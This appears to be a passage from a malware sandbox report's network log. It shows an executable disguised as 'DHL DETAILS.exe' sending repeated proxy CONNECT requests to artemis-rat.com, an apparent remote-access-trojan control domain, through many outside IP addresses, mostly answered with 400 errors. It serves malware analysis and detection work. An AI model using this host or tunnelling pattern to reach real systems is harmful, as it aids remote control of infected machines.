                                                                                    Mar 9, 2024 13:14:14.885898113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    639192.168.2.551876104.248.151.220597556352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.885898113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.677109957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.781323910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.871243000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    640192.168.2.5518618.219.228.100156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.885904074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    641192.168.2.552022104.21.6.88806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.886044979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.041047096 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    642192.168.2.55189945.120.178.19710806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.886045933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    643192.168.2.551738124.163.236.5473026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.886401892 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:15.801806927 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:16.290132046 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    644192.168.2.55191084.39.112.14431286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.887784958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    645192.168.2.55165336.134.91.8288886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.888423920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    646192.168.2.551890121.128.194.154806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.890029907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    647192.168.2.55143451.79.87.144543956352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.898098946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.442516088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.333348989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.724428892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    648192.168.2.551914150.109.243.156156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.902767897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    649192.168.2.552040104.16.213.202806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.905591965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.059746027 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    650192.168.2.552041172.67.181.51806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.906045914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.060133934 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:14 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    651192.168.2.5519328.218.231.62156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.906829119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    652192.168.2.551979184.178.172.5153036352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.914489985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    653192.168.2.55198098.170.57.24941456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.917880058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    654192.168.2.55198472.210.252.13741456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.922714949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    655192.168.2.551916210.4.194.196806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.923007965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    656192.168.2.54973045.65.138.489996352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.927850962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.939634085 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    657192.168.2.551940103.23.100.141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.939542055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.677069902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.781372070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    658192.168.2.551947211.222.252.187806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.943850994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.249495983 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    659192.168.2.552112104.16.109.207806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.979254007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.134047985 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    660192.168.2.55190034.93.157.87218026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.979500055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.829070091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    661192.168.2.551888103.153.154.6806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.979820013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.394704103 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    662192.168.2.552143104.25.114.28806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.980397940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.135186911 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    663192.168.2.551943185.81.153.16233896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.980483055 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    664192.168.2.552137162.159.247.57806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.980885983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.142079115 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    665192.168.2.552076172.67.182.48806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.981940031 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.136338949 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
